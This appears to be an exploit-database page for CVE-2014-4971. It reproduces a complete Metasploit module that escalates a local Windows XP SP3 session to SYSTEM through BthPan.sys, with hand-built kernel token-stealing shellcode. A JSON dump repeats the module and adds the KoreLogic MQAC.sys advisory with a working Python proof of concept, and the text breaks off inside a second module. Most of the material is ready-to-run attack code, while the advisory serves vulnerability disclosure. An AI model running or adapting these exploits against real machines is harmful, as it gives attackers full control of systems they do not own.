Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
2014-10-16T00:00:00
ID 1337DAY-ID-22760 Type zdt Reporter metasploit Modified 2014-10-16T00:00:00
Description
A vulnerability within Microsoft Bluetooth Personal Area Networking module, BthPan.sys, can allow an attacker to inject memory controlled by the attacker into an arbitrary location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Exploit::Local::WindowsKernel
include Msf::Post::File
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
'Description' => %q{
A vulnerability within Microsoft Bluetooth Personal Area Networking module,
BthPan.sys, can allow an attacker to inject memory controlled by the attacker
into an arbitrary location. This can be used by an attacker to overwrite
HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
NtQueryIntervalProfile.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
'Jay Smith <jsmith[at]korelogic.com>' # MSF module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Targets' =>
[
['Windows XP SP3',
{
'HaliQuerySystemInfo' => 0x16bba,
'_KPROCESS' => "\x44",
'_TOKEN' => "\xc8",
'_UPID' => "\x84",
'_APLINKS' => "\x88"
}
]
],
'References' =>
[
[ 'CVE', '2014-4971' ],
[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],
[ 'OSVDB', '109387' ]
],
'DisclosureDate' => 'Jul 18 2014',
'DefaultTarget' => 0
))
end
def ring0_shellcode
tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
tokenswap << "\x8B\x40\x44\x50\xBB\x04"
tokenswap << "\x00\x00\x00\x8B\x80\x88"
tokenswap << "\x00\x00\x00\x2D\x88"
tokenswap << "\x00\x00\x00\x39\x98\x84"
tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
tokenswap << [session.sys.process.getpid].pack('V')
tokenswap << "\x8B\x80\x88\x00\x00\x00"
tokenswap << "\x2D\x88\x00\x00\x00"
tokenswap << "\x39\x98\x84\x00\x00\x00"
tokenswap << "\x75\xED\x89\xB8\xC8"
tokenswap << "\x00\x00\x00\x61\xC3"
end
def fill_memory(proc, address, length, content)
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
unless proc.memory.writable?(address)
vprint_error("Failed to allocate memory")
return nil
end
vprint_good("#{address} is now writable")
result = proc.memory.write(address, content)
if result.nil?
vprint_error("Failed to write contents to memory")
return nil
end
vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
return address
end
def disclose_addresses(t)
addresses = {}
hal_dispatch_table = find_haldispatchtable
return nil if hal_dispatch_table.nil?
addresses['halDispatchTable'] = hal_dispatch_table
vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")
vprint_status('Getting the hal.dll base address...')
hal_info = find_sys_base('hal.dll')
if hal_info.nil?
vprint_error('Failed to disclose hal.dll base address')
return nil
end
hal_base = hal_info[0]
vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")
hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
addresses['HaliQuerySystemInfo'] = hali_query_system_information
vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
addresses
end
def check
if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
return Exploit::CheckCode::Safe
end
os = sysinfo["OS"]
return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i
handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
return Exploit::CheckCode::Safe unless handle
session.railgun.kernel32.CloseHandle(handle)
return Exploit::CheckCode::Vulnerable
end
def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
unless check == Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
end
handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
if handle.nil?
fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
end
my_target = targets[0]
print_status("Disclosing the HalDispatchTable address...")
@addresses = disclose_addresses(my_target)
if @addresses.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Failed to disclose necessary address for exploitation. Aborting.")
else
print_good("Address successfully disclosed.")
end
print_status("Storing the shellcode in memory...")
this_proc = session.sys.process.open
kernel_shell = ring0_shellcode
kernel_shell_address = 0x1
buf = "\x90" * 0x6000
buf[0, 1028] = "\x50\x00\x00\x00" + "\x90" * 0x400
buf[0x5000, kernel_shell.length] = kernel_shell
result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
if result.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
end
print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
session.railgun.kernel32.CloseHandle(handle)
print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
print_status("Checking privileges after exploitation...")
unless is_system?
fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
end
print_good("Privilege escalation successful!")
p = payload.encoded
print_status("Injecting #{p.length} bytes to memory and executing it...")
unless execute_shellcode(p)
fail_with(Failure::Unknown, "Error while executing the payload")
end
end
end
# 0day.today [2018-04-14] #
{"published": "2014-10-16T00:00:00", "id": "1337DAY-ID-22760", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "A vulnerability within Microsoft Bluetooth Personal Area Networking module, BthPan.sys, can allow an attacker to inject memory controlled by the attacker into an arbitrary location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.", "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2018-04-14T03:46:17", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-4971"]}, {"type": "exploitdb", "idList": ["EDB-ID:34131", "EDB-ID:34112", "EDB-ID:34982", "EDB-ID:34167"]}, {"type": "korelogic", "idList": ["KL-001-2014-003", "KL-001-2014-002"]}, {"type": "zdt", "idList": ["1337DAY-ID-22462", "1337DAY-ID-22459", "1337DAY-ID-22477"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2A8B8964BB26CD0903DEAAD854198D2F", "EXPLOITPACK:6C1249C6408DDF548B106905FC847650"]}, {"type": "nessus", "idList": ["SMB_NT_MS14-062.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/BTHPAN", "MSF:EXPLOIT/WINDOWS/LOCAL/MQAC_WRITE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127536", "PACKETSTORM:127618", "PACKETSTORM:127535", "PACKETSTORM:128674"]}, {"type": "canvas", "idList": ["MQAC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804492"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14016", "SECURITYVULNS:DOC:30943", "SECURITYVULNS:DOC:30942", "SECURITYVULNS:VULN:13881"]}, {"type": "seebug", "idList": ["SSV:87151", "SSV:87150"]}, {"type": "kaspersky", "idList": ["KLA10601"]}], "modified": "2018-04-14T03:46:17", "rev": 2}, "vulnersScore": 8.4}, "type": "zdt", "lastseen": "2018-04-14T03:46:17", "edition": 2, "title": "Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation", "href": "https://0day.today/exploit/description/22760", "modified": "2014-10-16T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": ["CVE-2014-4971"], "sourceHref": "https://0day.today/exploit/22760", "references": [], "reporter": "metasploit", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/local/windows_kernel'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = AverageRanking\r\n\r\n include Msf::Exploit::Local::WindowsKernel\r\n include Msf::Post::File\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',\r\n 'Description' => %q{\r\n A vulnerability within Microsoft Bluetooth Personal Area Networking module,\r\n BthPan.sys, can allow an attacker to inject memory controlled by the attacker\r\n into an arbitrary location. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\r\n NtQueryIntervalProfile.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC\r\n 'Jay Smith <jsmith[at]korelogic.com>' # MSF module\r\n ],\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Targets' =>\r\n [\r\n ['Windows XP SP3',\r\n {\r\n 'HaliQuerySystemInfo' => 0x16bba,\r\n '_KPROCESS' => \"\\x44\",\r\n '_TOKEN' => \"\\xc8\",\r\n '_UPID' => \"\\x84\",\r\n '_APLINKS' => \"\\x88\"\r\n }\r\n ]\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-4971' ],\r\n [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],\r\n [ 'OSVDB', '109387' ]\r\n ],\r\n 'DisclosureDate' => 'Jul 18 2014',\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n\r\n def ring0_shellcode\r\n tokenswap = \"\\x60\\x64\\xA1\\x24\\x01\\x00\\x00\"\r\n tokenswap << \"\\x8B\\x40\\x44\\x50\\xBB\\x04\"\r\n tokenswap << \"\\x00\\x00\\x00\\x8B\\x80\\x88\"\r\n tokenswap << \"\\x00\\x00\\x00\\x2D\\x88\"\r\n tokenswap << \"\\x00\\x00\\x00\\x39\\x98\\x84\"\r\n tokenswap << \"\\x00\\x00\\x00\\x75\\xED\\x8B\\xB8\\xC8\"\r\n tokenswap << \"\\x00\\x00\\x00\\x83\\xE7\\xF8\\x58\\xBB\"\r\n tokenswap << [session.sys.process.getpid].pack('V')\r\n tokenswap << \"\\x8B\\x80\\x88\\x00\\x00\\x00\"\r\n tokenswap << \"\\x2D\\x88\\x00\\x00\\x00\"\r\n tokenswap << \"\\x39\\x98\\x84\\x00\\x00\\x00\"\r\n tokenswap << \"\\x75\\xED\\x89\\xB8\\xC8\"\r\n tokenswap << \"\\x00\\x00\\x00\\x61\\xC3\"\r\n end\r\n\r\n def fill_memory(proc, address, length, content)\r\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), \"MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN\", \"PAGE_EXECUTE_READWRITE\")\r\n\r\n unless proc.memory.writable?(address)\r\n vprint_error(\"Failed to allocate memory\")\r\n return nil\r\n end\r\n vprint_good(\"#{address} is now writable\")\r\n\r\n result = proc.memory.write(address, content)\r\n\r\n if result.nil?\r\n vprint_error(\"Failed to write contents to memory\")\r\n return nil\r\n end\r\n vprint_good(\"Contents successfully written to 0x#{address.to_s(16)}\")\r\n\r\n return address\r\n end\r\n\r\n def disclose_addresses(t)\r\n addresses = {}\r\n\r\n hal_dispatch_table = find_haldispatchtable\r\n return nil if hal_dispatch_table.nil?\r\n addresses['halDispatchTable'] = hal_dispatch_table\r\n vprint_good(\"HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}\")\r\n\r\n vprint_status('Getting the hal.dll base address...')\r\n hal_info = find_sys_base('hal.dll')\r\n if hal_info.nil?\r\n vprint_error('Failed to disclose hal.dll base address')\r\n return nil\r\n end\r\n hal_base = hal_info[0]\r\n vprint_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16)}\")\r\n\r\n hali_query_system_information = hal_base + t['HaliQuerySystemInfo']\r\n addresses['HaliQuerySystemInfo'] = hali_query_system_information\r\n\r\n vprint_good(\"HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}\")\r\n addresses\r\n end\r\n\r\n def check\r\n if sysinfo[\"Architecture\"] =~ /wow64/i || sysinfo[\"Architecture\"] =~ /x64/\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n os = sysinfo[\"OS\"]\r\n return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i\r\n\r\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\r\n return Exploit::CheckCode::Safe unless handle\r\n\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Exploit::Failure::None, 'Session is already elevated')\r\n end\r\n\r\n unless check == Exploit::CheckCode::Vulnerable\r\n fail_with(Exploit::Failure::NotVulnerable, \"Exploit not available on this system\")\r\n end\r\n\r\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\r\n if handle.nil?\r\n fail_with(Failure::NoTarget, \"Unable to open \\\\\\\\.\\\\bthpan device\")\r\n end\r\n\r\n my_target = targets[0]\r\n print_status(\"Disclosing the HalDispatchTable address...\")\r\n @addresses = disclose_addresses(my_target)\r\n if @addresses.nil?\r\n session.railgun.kernel32.CloseHandle(handle)\r\n fail_with(Failure::Unknown, \"Failed to disclose necessary address for exploitation. Aborting.\")\r\n else\r\n print_good(\"Address successfully disclosed.\")\r\n end\r\n\r\n print_status(\"Storing the shellcode in memory...\")\r\n this_proc = session.sys.process.open\r\n kernel_shell = ring0_shellcode\r\n kernel_shell_address = 0x1\r\n\r\n buf = \"\\x90\" * 0x6000\r\n buf[0, 1028] = \"\\x50\\x00\\x00\\x00\" + \"\\x90\" * 0x400\r\n buf[0x5000, kernel_shell.length] = kernel_shell\r\n\r\n result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)\r\n if result.nil?\r\n session.railgun.kernel32.CloseHandle(handle)\r\n fail_with(Failure::Unknown, \"Error while storing the kernel stager shellcode on memory\")\r\n end\r\n print_good(\"Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}\")\r\n\r\n print_status(\"Triggering the vulnerability, corrupting the HalDispatchTable...\")\r\n session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses[\"halDispatchTable\"] + 0x4, 0)\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n print_status(\"Executing the Kernel Stager throw NtQueryIntervalProfile()...\")\r\n session.railgun.ntdll.NtQueryIntervalProfile(2, 4)\r\n\r\n print_status(\"Checking privileges after exploitation...\")\r\n\r\n unless is_system?\r\n fail_with(Failure::Unknown, \"The privilege escalation wasn't successful\")\r\n end\r\n print_good(\"Privilege escalation successful!\")\r\n\r\n p = payload.encoded\r\n print_status(\"Injecting #{p.length} bytes to memory and executing it...\")\r\n unless execute_shellcode(p)\r\n fail_with(Failure::Unknown, \"Error while executing the payload\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-04-14] #", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:14:31", "description": "Microsoft Windows XP SP3 does not validate addresses in certain IRP handler routines, which allows local users to write data to arbitrary memory locations, and consequently gain privileges, via a crafted address in an IOCTL call, related to (1) the MQAC.sys driver in the MQ Access Control subsystem and (2) the BthPan.sys driver in the Bluetooth Personal Area Networking subsystem.\nCWE-123: Write-what-where Condition\n\n<a href=\"http://cwe.mitre.org/data/definitions/123.html\">CWE-123: Write-what-where Condition</a>", "edition": 4, "cvss3": {}, "published": "2014-07-26T15:55:00", "title": "CVE-2014-4971", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4971"], "modified": "2018-10-12T22:07:00", "cpe": ["cpe:/o:microsoft:windows_xp:*"], "id": "CVE-2014-4971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4971", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*"]}], "canvas": [{"lastseen": "2019-05-29T19:48:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "edition": 2, "description": "**Name**| mqac \n---|--- \n**CVE**| CVE-2014-4971 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| mqac \n**Notes**| References: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt \nCVE Name: CVE-2014-4971 \nVENDOR: Microsoft \nNotes: \nTested on: \nWindows XP Professional SP3 English \n \nConstraints: \nIn order to work the Message Queuing component must be installed \n \nUsage: \nWin32/MOSDEF$ runmodule mqac \n \nDate public: 11/28/2013 \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4971 \nCVSS: 7.2 \n\n", "modified": "2014-07-26T15:55:00", "published": "2014-07-26T15:55:00", "id": "MQAC", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/mqac", "type": "canvas", "title": "Immunity Canvas: MQAC", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:13", "description": "", "published": "2014-07-21T00:00:00", "type": "packetstorm", "title": "Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-21T00:00:00", "id": "PACKETSTORM:127536", "href": "https://packetstormsecurity.com/files/127536/Microsoft-XP-SP3-MQAC.sys-Arbitrary-Write-Privilege-Escalation.html", "sourceData": "`Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation \nAdvisory ID: KL-001-2014-003 \nPublication Date: 2014.07.18 \nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt \n \n \n1. Vulnerability Details \n \nAffected Vendor: Microsoft \nAffected Product: MQ Access Control \nAffected Versions: 5.1.0.1110 \nPlatform: Microsoft Windows XP SP3 \nCWE Classification: CWE-123: Write-what-where Condition \nImpact: Privilege Escalation \nAttack vector: IOCTL \nCVE ID: CVE-2014-4971 \n \n2. Vulnerability Description \n \nA vulnerability within the MQAC module allows an attacker to \ninject memory they control into an arbitrary location they \ndefine. This can be used by an attacker to overwrite \nHalDispatchTable+0x4 and execute arbitrary code by subsequently \ncalling NtQueryIntervalProfile. \n \n3. Technical Description \n \nA userland process can create a handle into the MQAC device and \nsubsequently make DeviceIoControlFile() calls into that device. \nDuring the IRP handler routine for 0x1965020f the user provided \nOutputBuffer address is not validated. This allows an attacker \nto specify an arbitrary address and write (or overwrite) the \nmemory residing at the specified address. This is classically \nknown as a write-what-where vulnerability and has well known \nexploitation methods associated with it. \n \nA stack trace from our fuzzing can be seen below. In our \nfuzzing testcase, the specified OutputBuffer in the \nDeviceIoControlFile() call is 0xffff0000. \n \nSTACK_TEXT: \nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b \nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 \nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc \nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d \nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d \nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31 \nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70 \nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7 \nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a \n \nReviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' \ncommand shows the fault originating in the mqac driver. \n \nOLLOWUP_IP: \nmqac!AC2QM+5d \nb230af37 891e mov dword ptr [esi],ebx \n \nReviewing the TRAP_FRAME at the time of crash we can see \nIopCompleteRequest() copying data from InputBuffer into the \nOutputBuffer. InputBuffer is another parameter provided to the \nDeviceIoControlFile() function and is therefore controllable by \nthe attacker. The edi register contains the invalid address \nprovided during the fuzz testcase. \n \nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4) \nErrCode = 00000002 \neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000 \neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc \ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 \nmqac!AC2QM+0x5d: \nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=???????? \n \nA write-what-where vulnerability can be leveraged to obtain \nescalated privileges. To do so, an attacker will need to \nallocate memory in userland that is populated with shellcode \ndesigned to find the Token for PID 4 (System) and then overwrite \nthe token for its own process. By leveraging the vulnerability \nin MQAC it is then possible to overwrite the pointer at \nHalDispatchTable+0x4 with a pointer to our shellcode. Calling \nNtQueryIntervalProfile() will subsequently call \nHalDispatchTable+0x4, execute our shellcode, and elevate the \nprivilege of the exploit process. \n \n4. Mitigation and Remediation Recommendation \n \nNone. A patch is not likely to be forthcoming from the vendor. \n \n5. Credit \n \nThis vulnerability was discovered by Matt Bergin of KoreLogic \nSecurity, Inc. \n \n6. Disclosure Timeline \n \n2014.04.28 - Initial contact; sent Microsoft report and PoC. \n2014.04.28 - Microsoft acknowledges receipt of vulnerability \nreport; states XP is no longer supported and asks if \nthe vulnerability affects other versions of Windows. \n2014.04.29 - KoreLogic asks Microsoft for clarification of their \nsupport policy for XP. \n2014.04.29 - Microsoft says XP-only vulnerabilities will not be \naddressed with patches. \n2014.04.29 - KoreLogic asks if Microsoft intends to address the \nvulnerability report. \n2014.04.29 - Microsoft opens case to investigate the impact of the \nvulnerability on non-XP systems. \n2014.05.06 - Microsoft asks again if this vulnerability affects \nnon-XP systems. \n2014.05.14 - KoreLogic informs Microsoft that the vulnerability \nreport is for XP and other Windows versions have \nnot been examined. \n2014.06.11 - KoreLogic informs Microsoft that 30 business days \nhave passed since vendor acknowledgement of the \ninitial report. KoreLogic requests CVE number for the \nvulnerability, if there is one. KoreLogic also \nrequests vendor's public identifier for the \nvulnerability along with the expected disclosure date. \n2014.06.11 - Microsoft responds to KoreLogic that the \nvulnerability does not affect an \"up-platform\" \nproduct. Says they are investigating embedded \nplatforms. Does not provide a CVE number or a \ndisclosure date. \n2014.06.30 - KoreLogic asks Microsoft for confirmation of their \nreceipt of the updated PoC. Also requests that \na CVE ID be issued to this vulnerability. \n2014.07.02 - 45 business days have elapsed since Microsoft \nacknowledged receipt of the vulnerability report and \nPoC. \n2014.07.07 - KoreLogic requests CVE from MITRE. \n2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to \nbe identical to KL-001-2014-002 and issues \nCVE-2014-4971 for both vulnerabilities. \n2014.07.18 - Public disclosure. \n \n7. Proof of Concept \n \n#!/usr/bin/python2 \n# \n# KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation \n# Matt Bergin (KoreLogic / Smash the Stack) \n# CVE-2014-4971 \n# \nfrom ctypes import * \nfrom struct import pack \nfrom os import getpid,system \nfrom sys import exit \nEnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA \nGetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle \nINVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 \n \n# thanks to offsec for the concept \n# I re-wrote the code as to not fully insult them :) \ndef getBase(name=None): \nretArray = c_ulong*1024 \nImageBase = retArray() \ncallback = c_int(1024) \ncbNeeded = c_long() \nEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) \nfor base in ImageBase: \ndriverName = c_char_p(\"\\x00\"*1024) \nGetDeviceDriverBaseNameA(base,driverName,48) \nif (name): \nif (driverName.value.lower() == name): \nreturn base \nelse: \nreturn (base,driverName.value) \nreturn None \n \nhandle = CreateFileA(\"\\\\\\\\.\\\\MQAC\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) \nprint \"[+] Handle \\\\\\\\.\\\\MQAC @ %s\" % (handle) \nNtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) \nbuf = \"\\x50\\x00\\x00\\x00\"+\"\\x90\"*0x400 \nWriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0))) \nWriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) \nWriteProcessMemory(-1, 0x5000, \"\\xcc\", 77, byref(c_int(0))) \n#Overwrite Pointer \nkBase,kVer = getBase() \nhKernel = LoadLibraryExA(kVer,0,1) \nHalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\") \nHalDispatchTable -= hKernel \nHalDispatchTable += kBase \nHalDispatchTable += 0x4 \nprint \"[+] Kernel @ %s, HalDispatchTable @ %s\" % (hex(kBase),hex(HalDispatchTable)) \nDeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0) \nprint \"[+] HalDispatchTable+0x4 overwritten\" \nCloseHandle(handle) \nNtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) \nexit(0) \n \nThe contents of this advisory are copyright(c) 2014 \nKoreLogic, Inc. and are licensed under a Creative Commons \nAttribution Share-Alike 4.0 (United States) License: \nhttp://creativecommons.org/licenses/by-sa/4.0/ \n \nKoreLogic, Inc. is a founder-owned and operated company with a \nproven track record of providing security services to entities \nranging from Fortune 500 to small and mid-sized companies. We \nare a highly skilled team of senior security consultants doing \nby-hand security assessments for the most important networks in \nthe U.S. and around the world. We are also developers of various \ntools and resources aimed at helping the security community. \nhttps://www.korelogic.com/about-korelogic.html \n \nOur public vulnerability disclosure policy is available at: \nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127536/KL-001-2014-003.txt"}, {"lastseen": "2016-12-05T22:15:02", "description": "", "published": "2014-07-25T00:00:00", "type": "packetstorm", "title": "MQAC.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-25T00:00:00", "id": "PACKETSTORM:127618", "href": "https://packetstormsecurity.com/files/127618/MQAC.sys-Arbitrary-Write-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Local \nRank = AverageRanking \n \ninclude Msf::Post::Windows::Priv \ninclude 